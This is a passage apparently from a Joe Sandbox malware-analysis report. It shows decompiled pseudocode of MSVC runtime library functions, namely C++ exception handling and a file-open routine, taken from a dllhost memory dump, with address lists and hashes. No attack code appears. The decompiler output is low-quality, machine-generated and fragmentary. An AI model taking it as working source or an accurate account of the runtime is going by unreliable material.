																		_t50 = _t278 - 0x10; // 0x0
																		_v60 = _t50;
																		_t289 = _a20;
																		__eflags =  *((intOrPtr*)(_t278 - 0x10)) - _t234;
																		if( *((intOrPtr*)(_t278 - 0x10)) <= _t234) {
																			__eflags = _t234 -  *((intOrPtr*)(_t278 - 0xc));
																			if(_t234 <=  *((intOrPtr*)(_t278 - 0xc))) {
																				_v24 =  *_t278;
																				_t263 =  *(_t278 - 4);
																				__eflags = _t263;
																				_v32 = _t263;
																				_t253 = _a8;
																				if(_t263 > 0) {
																					_t279 = _v24;
																					_t236 =  *( *((intOrPtr*)(_t304 + 0x1c)) + 0xc);
																					_t287 =  *_t236;
																					_t237 =  &(_t236[1]);
																					__eflags = _t237;
																					_v52 = _t237;
																					_t238 = _v32;
																					_v56 = _t287;
																					while(1) {
																						_v20 = _v52;
																						_t289 = _a20;
																						_v40 = _t287;
																						__eflags = _t287;
																						if(_t287 <= 0) {
																							goto L41;
																						} else {
																							goto L38;
																						}
																						while(1) {
																							L38:
																							_t240 = E02872B69(_t279,  *_v20,  *((intOrPtr*)(_t304 + 0x1c)));
																							_t316 = _t316 + 0xc;
																							__eflags = _t240;
																							if(_t240 != 0) {
																								break;
																							}
																							_v20 = _v20 + 4;
																							_t244 = _v40 - 1;
																							_t279 = _v24;
																							_v40 = _t244;
																							__eflags = _t244;
																							if(_t244 > 0) {
																								continue;
																							} else {
																								_t238 = _v32;
																								goto L41;
																							}
																							L44:
																							_t282 = _v28;
																							_t278 = _v36;
																							_t234 = _v12;
																							goto L45;
																						}
																						_push(_v44);
																						_v5 = 1;
																						E02872157(_t253, _t287, _t304, _t253, _v16, _a16, _t289, _v24,  *_v20, _v60, _a28, _a32);
																						_t316 = _t316 + 0x2c;
																						goto L44;
																						L41:
																						_t238 = _t238 - 1;
																						_t279 = _t279 + 0x10;
																						_v32 = _t238;
																						_v24 = _t279;
																						__eflags = _t238;
																						if(_t238 > 0) {
																							_t287 = _v56;
																							_v20 = _v52;
																							_t289 = _a20;
																							_v40 = _t287;
																							__eflags = _t287;
																							if(_t287 <= 0) {
																								goto L41;
																							} else {
																								goto L38;
																							}
																						}
																						goto L44;
																					}
																				}
																			}
																		}
																		L45:
																		_t282 = _t282 + 1;
																		_t278 = _t278 + 0x14;
																		_v28 = _t282;
																		_v36 = _t278;
																		__eflags = _t282 - _v48;
																	} while (_t282 < _v48);
																}
															}
															__eflags = _a24;
															if(__eflags != 0) {
																_push(1);
																E02871E94(__eflags);
																_t264 = _t304;
															}
															__eflags = _v5;
															if(__eflags != 0) {
																L60:
																_t225 = E0287360E(_t253, _t264, _t282, _t289, _t304, __eflags);
																__eflags =  *(_t225 + 0x1c);
																if(__eflags != 0) {
																	goto L62;
																} else {
																	goto L61;
																}
															} else {
																_t227 =  *_t289 & 0x1fffffff;
																__eflags = _t227 - 0x19930521;
																if(__eflags < 0) {
																	goto L60;
																} else {
																	__eflags = _t289[7];
																	if(_t289[7] != 0) {
																		L52:
																		__eflags = _t289[8] & 0x00000004;
																		if(__eflags != 0) {
																			goto L62;
																		} else {
																			_push(_t289[7]);
																			L86();
																			_t264 = _t304;
																			__eflags = _t227;
																			if(__eflags != 0) {
																				goto L60;
																			} else {
																				E0287360E(_t253, _t264, _t282, _t289, _t304, __eflags);
																				E0287360E(_t253, _t264, _t282, _t289, _t304, __eflags);
																				 *((intOrPtr*)(E0287360E(_t253, _t264, _t282, _t289, _t304, __eflags) + 0x10)) = _t304;
																				_t231 = E0287360E(_t253, _t264, _t282, _t289, _t304, __eflags);
																				__eflags = _a32;
																				_t267 = _v16;
																				_push(_t304);
																				 *((intOrPtr*)(_t231 + 0x14)) = _t267;
																				if(_a32 != 0) {
																					goto L64;
																				} else {
																					_push(_t253);
																				}
																				goto L65;
																			}
																		}
																	} else {
																		__eflags = _t289[8] & 0x00000004;
																		if(__eflags == 0) {
																			goto L60;
																		} else {
																			goto L52;
																		}
																	}
																}
															}
														} else {
															__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930521;
															if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930521) {
																goto L30;
															} else {
																__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930522;
																if( *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
																	goto L57;
																} else {
																	goto L30;
																}
															}
														}
													}
												}
											} else {
												_v36 =  *((intOrPtr*)(E0287360E(_t253, _t264, _t282, _t289, _t304, _t337) + 0x1c));
												_t251 = E0287360E(_t253, _t264, _t282, _t289, _t304, _t337);
												_push(_v36);
												_push(_t304);
												 *(_t251 + 0x1c) =  *(_t251 + 0x1c) & 0x00000000;
												L86();
												if(_t251 != 0) {
													goto L24;
												} else {
													_push(_v36);
													L99();
													_pop(_t264);
													_t339 = _t251;
													if(_t251 == 0) {
														goto L62;
													} else {
													}
													L63:
													_push(1);
													_push(_t304);
													E02871E94(_t339);
													_t267 =  &_v72;
													E02871F49(_t267);
													E028733CD( &_v72, 0x288de1c);
													L64:
													_push(_a32);
													L65:
													E02873923(_t267);
													_push(_a16);
													_push(_t253);
													E028729A5(_t253, _t267, _t282, _t289, _t339);
													_t317 = _t316 + 0x10;
													_push(_t289[7]);
													_t198 = E0287211D(_t253, _t267, _t282, _t289, _t304, _t339);
													asm("int3");
													_t313 = _t317;
													_push(_t267);
													_push(_t267);
													_push(_t289);
													_t290 = _v80;
													_t340 =  *_t290 - 0x80000003;
													if( *_t290 == 0x80000003) {
														L84:
														return _t198;
													} else {
														_push(_t253);
														_t199 = E0287360E(_t253, _t267, _t282, _t290, _t304, _t340, _t304);
														_t254 = _a16;
														_t341 =  *((intOrPtr*)(_t199 + 8));
														if( *((intOrPtr*)(_t199 + 8)) == 0) {
															L72:
															if( *((intOrPtr*)(_t254 + 0xc)) == 0) {
																E0287753C(_t254, _t267, _t290, _t304, __eflags);
																asm("int3");
																_push(_t313);
																_t314 = _t317;
																_t318 = _t317 - 0x18;
																_push(_t254);
																_push(_t304);
																_t305 = _v100;
																_push(_t290);
																__eflags = _t305;
																if(__eflags == 0) {
																	E0287753C(_t254, _t267, _t290, _t305, __eflags);
																	asm("int3");
																	_push(_t314);
																	_push(_t254);
																	_push(_t305);
																	_push(_t290);
																	_t292 = _v144;
																	_t306 = 0;
																	__eflags =  *_t292;
																	if( *_t292 <= 0) {
																		L103:
																		_t202 = 0;
																		__eflags = 0;
																	} else {
																		_t256 = 0;
																		while(1) {
																			_t206 = E0287359A( *((intOrPtr*)(_t256 + _t292[1] + 4)) + 4, 0x2895d4c);
																			__eflags = _t206;
																			if(_t206 == 0) {
																				break;
																			}
																			_t306 = _t306 + 1;
																			_t256 = _t256 + 0x10;
																			__eflags = _t306 -  *_t292;
																			if(_t306 <  *_t292) {
																				continue;
																			} else {
																				goto L103;
																			}
																			goto L104;
																		}
																		_t202 = 1;
																	}
																	L104:
																	return _t202;
																} else {
																	_t294 =  *_t305;
																	_t257 = 0;
																	__eflags = _t294;
																	if(_t294 > 0) {
																		_t283 = 0;
																		_v16 = 0;
																		_t210 =  *((intOrPtr*)( *((intOrPtr*)(_v4 + 0x1c)) + 0xc));
																		_t211 = _t210 + 4;
																		__eflags = _t211;
																		_v28 =  *_t210;
																		_v36 = _t211;
																		do {
																			_t271 = _t211;
																			_t212 = _v28;
																			_v24 = _t211;
																			_v20 = _t212;
																			__eflags = _t212;
																			if(_t212 > 0) {
																				_t214 =  *((intOrPtr*)(_t305 + 4)) + _t283;
																				__eflags = _t214;
																				_v32 = _t214;
																				while(1) {
																					_t215 = E02872B69(_t214,  *_t271,  *((intOrPtr*)(_v4 + 0x1c)));
																					_t318 = _t318 + 0xc;
																					__eflags = _t215;
																					if(_t215 != 0) {
																						break;
																					}
																					_t217 = _v20 - 1;
																					_t271 = _v24 + 4;
																					_v20 = _t217;
																					__eflags = _t217;
																					_v24 = _v24 + 4;
																					_t214 = _v32;
																					if(_t217 > 0) {
																						continue;
																					} else {
																					}
																					L95:
																					_t283 = _v16;
																					goto L96;
																				}
																				_t257 = 1;
																				goto L95;
																			}
																			L96:
																			_t211 = _v36;
																			_t283 = _t283 + 0x10;
																			_v16 = _t283;
																			_t294 = _t294 - 1;
																			__eflags = _t294;
																		} while (_t294 != 0);
																	}
																	return _t257;
																}
															} else {
																_t198 = E02873879(_t267, _t254, _a24, _a20,  &_v16,  &_v12);
																_t273 = _v16;
																_t319 = _t317 + 0x14;
																_t285 = _v12;
																if(_t273 < _t285) {
																	_t137 =  &(_t198[3]); // 0xc
																	_t310 = _t137;
																	_t198 = _a20;
																	do {
																		if(_t198 >=  *((intOrPtr*)(_t310 - 0xc)) && _t198 <=  *((intOrPtr*)(_t310 - 8))) {
																			_t221 =  *_t310 << 4;
																			if( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) == 0) {
																				L79:
																				_t222 = _t221 + _t310[1] + 0xfffffff0;
																				_t300 = _v0;
																				if(( *(_t221 + _t310[1] + 0xfffffff0) & 0x00000040) == 0) {
																					_push(1);
																					_t155 = _t310 - 0xc; // 0x0
																					E02872157(_t254, _t285, _t300, _a4, _a8, _a12, _t254, _t222, 0, _t155, _a24, _a28);
																					_t285 = _v12;
																					_t319 = _t319 + 0x2c;
																					_t273 = _v16;
																				}
																			} else {
																				_t285 = _v12;
																				_t254 = _a16;
																				if( *((char*)( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) + 8)) == 0) {
																					goto L79;
																				}
																			}
																			_t198 = _a20;
																		}
																		_t273 = _t273 + 1;
																		_t310 =  &(_t310[5]);
																		_v16 = _t273;
																	} while (_t273 < _t285);
																}
																goto L83;
															}
														} else {
															__imp__EncodePointer();
															_t304 = _t199;
															if( *((intOrPtr*)(E0287360E(_t254, _t267, _t282, _t290, _t304, _t341, 0) + 8)) == _t304 ||  *_t290 == 0xe0434f4d ||  *_t290 == 0xe0434352) {
																goto L72;
															} else {
																_t198 = E0287379C(_t290, _a4, _a8, _a12, _t254, _a24, _a28);
																_t317 = _t317 + 0x1c;
																if(_t198 != 0) {
																	L83:
																	goto L84;
																} else {
																	goto L72;
																}
															}
														}
													}
												}
											}
										} else {
											_t336 =  *((intOrPtr*)(_t304 + 0x1c));
											if( *((intOrPtr*)(_t304 + 0x1c)) == 0) {
												goto L62;
											} else {
												goto L19;
											}
										}
									}
								}
							}
						}
					}
				}
			}
















































































                                                0x0287221c
                                                0x0287221c
                                                0x02872223
                                                0x02872226
                                                0x02872228
                                                0x0287222b
                                                0x0287222f
                                                0x0287223a
                                                0x02872242
                                                0x0287223c
                                                0x0287223c
                                                0x0287223c
                                                0x02872245
                                                0x0287224b
                                                0x02872535
                                                0x02872535
                                                0x00000000
                                                0x0287225a
                                                0x0287225a
                                                0x02872263
                                                0x028724fe
                                                0x00000000
                                                0x02872269
                                                0x0287226d
                                                0x02872341
                                                0x02872341
                                                0x02872344
                                                0x00000000
                                                0x02872292
                                                0x02872292
                                                0x02872296
                                                0x00000000
                                                0x0287229c
                                                0x0287229c
                                                0x028722a1
                                                0x028722a5
                                                0x0287252e
                                                0x02872534
                                                0x028722ab
                                                0x028722b0
                                                0x028722b3
                                                0x028722b8
                                                0x028722bf
                                                0x028722c4
                                                0x00000000
                                                0x028722ca
                                                0x028722d0
                                                0x028722fd
                                                0x028722fd
                                                0x02872302
                                                0x02872306
                                                0x02872349
                                                0x02872349
                                                0x0287234c
                                                0x0287234f
                                                0x0287234f
                                                0x02872355
                                                0x02872501
                                                0x02872501
                                                0x02872505
                                                0x00000000
                                                0x02872507
                                                0x02872507
                                                0x0287250b
                                                0x00000000
                                                0x0287250d
                                                0x0287250d
                                                0x02872510
                                                0x02872513
                                                0x02872514
                                                0x02872515
                                                0x02872518
                                                0x02872519
                                                0x0287251a
                                                0x0287251b
                                                0x02872520
                                                0x00000000
                                                0x02872520
                                                0x0287250b
                                                0x0287235b
                                                0x0287235b
                                                0x0287235f
                                                0x00000000
                                                0x02872365
                                                0x02872365
                                                0x0287236c
                                                0x02872384
                                                0x02872384
                                                0x02872388
                                                0x02872392
                                                0x0287239b
                                                0x028723a0
                                                0x028723a3
                                                0x028723a6
                                                0x028723a9
                                                0x028723af
                                                0x028723af
                                                0x028723b2
                                                0x028723b5
                                                0x028723b8
                                                0x028723b8
                                                0x028723bb
                                                0x028723be
                                                0x028723c1
                                                0x028723c4
                                                0x028723ca
                                                0x028723cd
                                                0x028723d5
                                                0x028723d8
                                                0x028723db
                                                0x028723dd
                                                0x028723e0
                                                0x028723e3
                                                0x028723ec
                                                0x028723ef
                                                0x028723f2
                                                0x028723f4
                                                0x028723f4
                                                0x028723f7
                                                0x028723fa
                                                0x028723fd
                                                0x02872400
                                                0x02872403
                                                0x02872406
                                                0x02872409
                                                0x0287240c
                                                0x0287240e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02872410
                                                0x02872410
                                                0x02872419
                                                0x0287241e
                                                0x02872421
                                                0x02872423
                                                0x00000000
                                                0x00000000
                                                0x02872428
                                                0x0287242c
                                                0x0287242d
                                                0x02872430
                                                0x02872433
                                                0x02872435
                                                0x00000000
                                                0x02872437
                                                0x02872437
                                                0x00000000
                                                0x02872437
                                                0x02872476
                                                0x02872476
                                                0x02872479
                                                0x0287247c
                                                0x00000000
                                                0x0287247c
                                                0x0287244d
                                                0x02872456
                                                0x0287246e
                                                0x02872473
                                                0x00000000
                                                0x0287243a
                                                0x0287243a
                                                0x0287243b
                                                0x0287243e
                                                0x02872441
                                                0x02872444
                                                0x02872446
                                                0x02872448
                                                0x02872403
                                                0x02872406
                                                0x02872409
                                                0x0287240c
                                                0x0287240e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0287240e
                                                0x00000000
                                                0x02872446
                                                0x02872400
                                                0x028723e3
                                                0x028723cd
                                                0x0287247f
                                                0x0287247f
                                                0x02872480
                                                0x02872483
                                                0x02872486
                                                0x02872489
                                                0x02872489
                                                0x028723b8
                                                0x028723a9
                                                0x02872492
                                                0x02872496
                                                0x02872498
                                                0x0287249b
                                                0x028724a1
                                                0x028724a1
                                                0x028724a2
                                                0x028724a6
                                                0x02872523
                                                0x02872523
                                                0x02872528
                                                0x0287252c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x028724a8
                                                0x028724aa
                                                0x028724af
                                                0x028724b4
                                                0x00000000
                                                0x028724b6
                                                0x028724b6
                                                0x028724ba
                                                0x028724c2
                                                0x028724c2
                                                0x028724c6
                                                0x00000000
                                                0x028724c8
                                                0x028724c8
                                                0x028724cc
                                                0x028724d2
                                                0x028724d3
                                                0x028724d5
                                                0x00000000
                                                0x028724d7
                                                0x028724d7
                                                0x028724dc
                                                0x028724e6
                                                0x028724e9
                                                0x028724ee
                                                0x028724f2
                                                0x028724f5
                                                0x028724f6
                                                0x028724f9
                                                0x00000000
                                                0x028724fb
                                                0x028724fb
                                                0x028724fb
                                                0x00000000
                                                0x028724f9
                                                0x028724d5
                                                0x028724bc
                                                0x028724bc
                                                0x028724c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x028724c0
                                                0x028724ba
                                                0x028724b4
                                                0x0287236e
                                                0x0287236e
                                                0x02872375
                                                0x00000000
                                                0x02872377
                                                0x02872377
                                                0x0287237e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0287237e
                                                0x02872375
                                                0x0287236c
                                                0x0287235f
                                                0x02872308
                                                0x02872310
                                                0x02872313
                                                0x02872318
                                                0x0287231b
                                                0x0287231c
                                                0x02872320
                                                0x02872329
                                                0x00000000
                                                0x0287232b
                                                0x0287232b
                                                0x0287232e
                                                0x02872333
                                                0x02872334
                                                0x02872336
                                                0x00000000
                                                0x00000000
                                                0x0287233c
                                                0x0287253a
                                                0x0287253a
                                                0x0287253c
                                                0x0287253d
                                                0x02872544
                                                0x02872547
                                                0x02872555
                                                0x0287255a
                                                0x0287255a
                                                0x0287255d
                                                0x0287255d
                                                0x02872565
                                                0x02872568
                                                0x02872569
                                                0x0287256e
                                                0x02872571
                                                0x02872574
                                                0x02872579
                                                0x0287257b
                                                0x0287257d
                                                0x0287257e
                                                0x0287257f
                                                0x02872580
                                                0x02872583
                                                0x02872589
                                                0x0287268a
                                                0x0287268e
                                                0x0287258f
                                                0x0287258f
                                                0x02872591
                                                0x02872596
                                                0x02872599
                                                0x0287259d
                                                0x028725e4
                                                0x028725e8
                                                0x0287268f
                                                0x02872694
                                                0x02872695
                                                0x02872696
                                                0x02872698
                                                0x0287269b
                                                0x0287269c
                                                0x0287269d
                                                0x028726a0
                                                0x028726a1
                                                0x028726a3
                                                0x0287272b
                                                0x02872730
                                                0x02872731
                                                0x02872734
                                                0x02872735
                                                0x02872736
                                                0x02872737
                                                0x0287273a
                                                0x0287273c
                                                0x0287273e
                                                0x02872765
                                                0x02872765
                                                0x02872765
                                                0x02872740
                                                0x02872740
                                                0x02872742
                                                0x02872752
                                                0x02872759
                                                0x0287275b
                                                0x00000000
                                                0x00000000
                                                0x0287275d
                                                0x0287275e
                                                0x02872761
                                                0x02872763
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02872763
                                                0x0287276c
                                                0x0287276c
                                                0x02872767
                                                0x0287276b
                                                0x028726a9
                                                0x028726a9
                                                0x028726ab
                                                0x028726ad
                                                0x028726af
                                                0x028726b4
                                                0x028726b6
                                                0x028726bc
                                                0x028726c1
                                                0x028726c1
                                                0x028726c4
                                                0x028726c7
                                                0x028726ca
                                                0x028726ca
                                                0x028726cc
                                                0x028726cf
                                                0x028726d2
                                                0x028726d5
                                                0x028726d7
                                                0x028726dc
                                                0x028726dc
                                                0x028726de
                                                0x028726e1
                                                0x028726ea
                                                0x028726ef
                                                0x028726f2
                                                0x028726f4
                                                0x00000000
                                                0x00000000
                                                0x028726fc
                                                0x028726fd
                                                0x02872700
                                                0x02872703
                                                0x02872705
                                                0x02872708
                                                0x0287270b
                                                0x00000000
                                                0x00000000
                                                0x0287270d
                                                0x02872711
                                                0x02872711
                                                0x00000000
                                                0x02872711
                                                0x0287270f
                                                0x00000000
                                                0x0287270f
                                                0x02872714
                                                0x02872714
                                                0x02872717
                                                0x0287271a
                                                0x0287271d
                                                0x0287271d
                                                0x0287271d
                                                0x028726ca
                                                0x0287272a
                                                0x0287272a
                                                0x028725ee
                                                0x028725fd
                                                0x02872602
                                                0x02872605
                                                0x02872608
                                                0x0287260d
                                                0x0287260f
                                                0x0287260f
                                                0x02872612
                                                0x02872615
                                                0x02872618
                                                0x02872624
                                                0x0287262d
                                                0x02872642
                                                0x02872648
                                                0x0287264a
                                                0x02872650
                                                0x02872652
                                                0x02872657
                                                0x0287266c
                                                0x02872671
                                                0x02872674
                                                0x02872677
                                                0x02872677
                                                0x0287262f
                                                0x02872636
                                                0x0287263d
                                                0x02872640
                                                0x00000000
                                                0x00000000
                                                0x02872640
                                                0x0287267a
                                                0x0287267a
                                                0x0287267d
                                                0x0287267e
                                                0x02872681
                                                0x02872684
                                                0x02872615
                                                0x00000000
                                                0x0287260d
                                                0x0287259f
                                                0x028725a1
                                                0x028725a7
                                                0x028725b1
                                                0x00000000
                                                0x028725c3
                                                0x028725d4
                                                0x028725d9
                                                0x028725de
                                                0x02872688
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x028725de
                                                0x028725b1
                                                0x0287259d
                                                0x02872589
                                                0x02872329
                                                0x028722f3
                                                0x028722f3
                                                0x028722f7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x028722f7
                                                0x028722d0
                                                0x028722c4
                                                0x028722a5
                                                0x02872296
                                                0x0287226d
                                                0x02872263

                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 02872320
                                                • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 0287239B
                                                • ___TypeMatch.LIBVCRUNTIME ref: 02872419
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 0287249B
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 028724CC
                                                • FindHandlerForForeignException.LIBVCRUNTIME ref: 0287251B
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 0287253D
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02872555
                                                • _UnwindNestedFrames.LIBCMT ref: 0287255D
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 02872569
                                                • CallUnexpected.LIBVCRUNTIME ref: 02872574
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                • String ID: csm$csm$csm
                                                • API String ID: 410073093-393685449
                                                • Opcode ID: cc057b220078a5cd4df0e5270287838bfa20bf7fa636dc7cd29919ae1486d485
                                                • Instruction ID: 937ba6f51984085e0037cdd21c75d8c35edad659cdf5e12ae565bd250c226896
                                                • Opcode Fuzzy Hash: cc057b220078a5cd4df0e5270287838bfa20bf7fa636dc7cd29919ae1486d485
                                                • Instruction Fuzzy Hash: E4B1BD7D800609EFCF24DF99C850BAEBBB1BF18314F048159E859A7655C731EA51CFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0287FB76 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 41%
                                                			E0287FB76(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E0287F8D9(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E0287BF6B(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E0287F844();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0287BEB4(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x2896480 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = E0287F5F7(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x2896480 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E0287F844();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x2896480 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E02875D0D(GetLastError());
											 *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E0287C07D( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E0287FA55(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0287A32C(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E02875D0D(_t270);
							 *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E02875D43())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x2896480 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E02875D0D(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E0287F844();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E02875D30()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E02875D43())) = 0x18;
						goto L2;
					}
				} else {
					 *(E02875D30()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E02875D43()));
				}
			}





















































                                                0x0287fb99
                                                0x0287fb9d
                                                0x0287fb9e
                                                0x0287fb9e
                                                0x0287fb9e
                                                0x0287fba0
                                                0x0287fba6
                                                0x0287fbc1
                                                0x0287fbc6
                                                0x0287fbc9
                                                0x0287fbcb
                                                0x0287fbcd
                                                0x0287fbec
                                                0x0287fbf3
                                                0x0287fbfa
                                                0x0287fbfd
                                                0x0287fc09
                                                0x0287fc0c
                                                0x0287fc14
                                                0x0287fc15
                                                0x0287fc18
                                                0x0287fc18
